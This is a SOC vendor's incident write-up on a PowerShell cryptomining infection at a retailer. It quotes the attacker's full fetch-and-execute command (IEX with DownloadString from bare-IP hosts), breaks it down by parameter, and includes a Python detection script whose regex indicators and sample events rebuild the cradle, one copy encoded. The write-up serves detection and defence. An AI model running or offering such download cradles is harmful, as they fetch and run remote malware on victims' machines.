Cryptomining via PowerShell Caught at Retailer

The Network: A retailer with over 400 employees, more than a dozen distribution warehouses, and an extensive supply chain network to protect.

The Expectation: Protect the retailer’s assets and sensitive data from malicious activity while keeping the services that are the backbone of the business running.

The Catch: The EventTracker SOC (Security Operations Center) detected malware that had bypassed the customer’s traditional Anti-Virus (AV) software. EventTracker’s blue team defending the retail customer used targeted queries to cross-check systems for suspicious behavior and to search running processes for anomalies.

The Find: The analyst at the SOC used the advanced logic in EventTracker SIEM to detect a suspicious command in which cmd.exe invoked PowerShell to download a file from http://209.222.101.129:80/a and execute it directly in memory with Invoke-Expression (IEX). Malicious use of PowerShell is often not detected or stopped by traditional endpoint defenses, because a download cradle like this one never writes the payload to disk: the script text is fetched over HTTP and evaluated in the PowerShell process. The SOC actively monitors for suspicious use of well-known attack vectors such as PowerShell.

Command Line: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://209.222.101.129:80/a'))"

The attacker then tried to evade detection by re-issuing the same cradle against a second download host. Broken down parameter by parameter:

Command / parameter                              Description
powershell.exe                                   The PowerShell host process, launched from cmd.exe
-nop                                             -NoProfile: skip profile scripts, so no logging or defensive hooks in the profile run
-w hidden                                        -WindowStyle Hidden: run with no visible window
-c                                               -Command: execute the string that follows
IEX                                              Invoke-Expression: evaluate the downloaded text as PowerShell code, in memory
(new-object net.webclient).downloadstring        Fetch the remote resource as a string over HTTP
http://63.250.42.171:80/a                        URL to download, addressed by bare IP rather than a hostname

The EventTracker SOC analyst flagged the command line because the download URL used a bare IP address rather than a fully qualified domain name (FQDN), which legitimate software distribution rarely does. The SOC analyst then uncovered a suspicious DLL downloaded to the system.
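The detection described above (PowerShell launched with a hidden window and no profile, IEX over a WebClient download, a bare-IP URL) is straightforward to express as a scoring rule over process-creation command lines. The following is an added example, not EventTracker code and not taken from the customer’s logs: it scores Sysmon Event ID 1 / Security 4688 style command lines against weighted indicators and, going one step beyond the case above, also decodes a -EncodedCommand payload (base64 of UTF-16LE) so the same indicators are evaluated on the cleartext. The sample events, the weights, and the alert threshold are all constructed for illustration; the first sample reproduces the command line from this case and the second re-encodes the second host from the table.

```python
"""Score Windows process-creation command lines for PowerShell download-cradle indicators."""
import base64
import re
from typing import List, Optional, Tuple

# Weighted indicators (assumed weights, chosen for this example). PowerShell accepts any
# unambiguous prefix of a parameter name, so the common short forms are matched too.
INDICATORS = [
    ("no-profile switch",    r"-nop\w*",                                                     1),
    ("hidden window",        r"-w(?:in\w*)?\s+(?:hidden|1)\b",                               2),
    ("encoded command",      r"-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",            2),
    ("Invoke-Expression",    r"\b(?:iex|invoke-expression)\b",                               3),
    ("download primitive",   r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|net\.webclient)\b", 2),
    ("URL with raw IP host", r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/",                  3),
]
ALERT_THRESHOLD = 6  # assumed: a cradle hits several indicators; admin scripts hit one or none

ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the cleartext of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: leave the raw line to the other rules


def score_cmdline(cmdline: str) -> Tuple[int, List[str]]:
    """Score one command line; indicators inside a decoded payload count as well."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text = cmdline + " " + decoded
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            score += weight
            hits.append(name)
    return score, hits


def triage(events: List[dict]) -> List[dict]:
    """Return the events whose command line reaches the alert threshold."""
    alerts = []
    for ev in events:
        score, hits = score_cmdline(ev["cmdline"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"id": ev["id"], "parent": ev["parent"], "score": score, "hits": hits})
    return alerts


def _enc(ps: str) -> str:
    """Build the base64(UTF-16LE) form that PowerShell expects for -EncodedCommand."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events for this example; only the first command line is from the case above.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "cmd.exe", "cmdline":
        "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://209.222.101.129:80/a'))\""},
    {"id": 2, "parent": "cmd.exe", "cmdline":
        "powershell.exe -nop -w hidden -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://63.250.42.171:80/a')")},
    {"id": 3, "parent": "explorer.exe", "cmdline":
        "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"},
    {"id": 4, "parent": "services.exe", "cmdline":
        "powershell.exe -Command \"Get-Service | Where-Object Status -eq 'Running'\""},
    {"id": 5, "parent": "cmd.exe", "cmdline":
        "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile('https://updates.example.com/agent.msi','C:\\Temp\\agent.msi')\""},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"event {alert['id']} (parent {alert['parent']}): score {alert['score']}, {', '.join(alert['hits'])}")
```

Only the two cradles cross the threshold: the scheduled backup script scores a single point for -NoProfile, the service query scores nothing, and the hostname-addressed DownloadFile scores two, which is the level a SIEM would typically surface for review rather than alert on. The rule keys on the command line, not on the image name, so a renamed powershell.exe is still caught as long as its arguments are logged.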

Observation: EventTracker observed that SVChost.exe created a W3wp.exe process, which downloaded 1588408199.3060014.dll, a file that threat vendors categorize as a Trojan.

Trojan:Win32/Tiggre!rfn is a malicious program created by cyber criminals to mine cryptocurrency on victims' computers. The file is distributed to users disguised as a video file, but it is an AutoIt script that runs specific tasks to misuse the computer's resources for cryptomining.

Detonating the download in the EventTracker SOC sandbox confirmed that the URL was malicious; the sample exhibited the following behaviors:

  • Searches for the Microsoft Outlook file path
  • Attempts to load missing DLLs
  • Matches YARA signature
  • Creates temporary files
  • Reads ini files
  • Uses new MSVCR DLLs
  • Creates files inside the user directory
  • Reads software policies
  • Runs a DLL by calling functions
  • Spawns suspicious processes
  • Uses an in-process (OLE) automation server

Cryptomining malware infects workstations and laptops to build botnets that run computationally intensive mining in the background on unsuspecting companies' machines. Cryptomining degrades system performance, consumes power, and can be the doorway to other nefarious activity such as stealing credentials or sensitive data to monetize. Its use has exploded recently because exploit kits can be bought on the dark web for under $50 and used by less technical attackers. Cryptominers arrive through known attack vectors such as unsolicited phishing emails, socially engineered links, and malicious third-party apps that exploit vulnerabilities; all of these should be detected and removed.

The Fix: The EventTracker SOC promptly alerted the retail customer to the compromise and provided detailed remediation recommendations. The EventTracker analyst continued to monitor the network for further infection and possible lateral movement. We recommended the following countermeasures to protect the retailer and its extended supply chain:

  • Block file attachments that are commonly associated with malware, such as .dll and .exe, and attachments that cannot be scanned by antivirus software, such as .zip files.
  • Apply appropriate patches and updates as quickly as feasible.
  • Check for unwanted browser extensions.
  • Implement filters at the email gateway to screen out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • Adhere to the principle of least privilege. By ensuring that users have the minimum level of access required to accomplish their duties, you limit access to those with a “need to know”, and administrative credentials are held only by designated administrators, not by executives.
  • Provide employee training on social engineering and phishing. Urge employees not to open suspicious emails, click links contained in such emails, or post sensitive information online, and never to provide usernames, passwords, or personal information in response to any unsolicited request. Educate users to hover over a link to verify its destination before clicking it.

The Lesson: It has been estimated that 20% of all businesses have been compromised by cryptomining malware. Adversaries exploit known vulnerabilities to run their process-intensive mining. Legacy Anti-Virus (AV) solutions are often bypassed by these financially motivated cyber criminals. Consistent 24x7x365 monitoring and log correlation with SIEM tools, along with a focused threat hunting team, are crucial for visibility and advanced threat protection.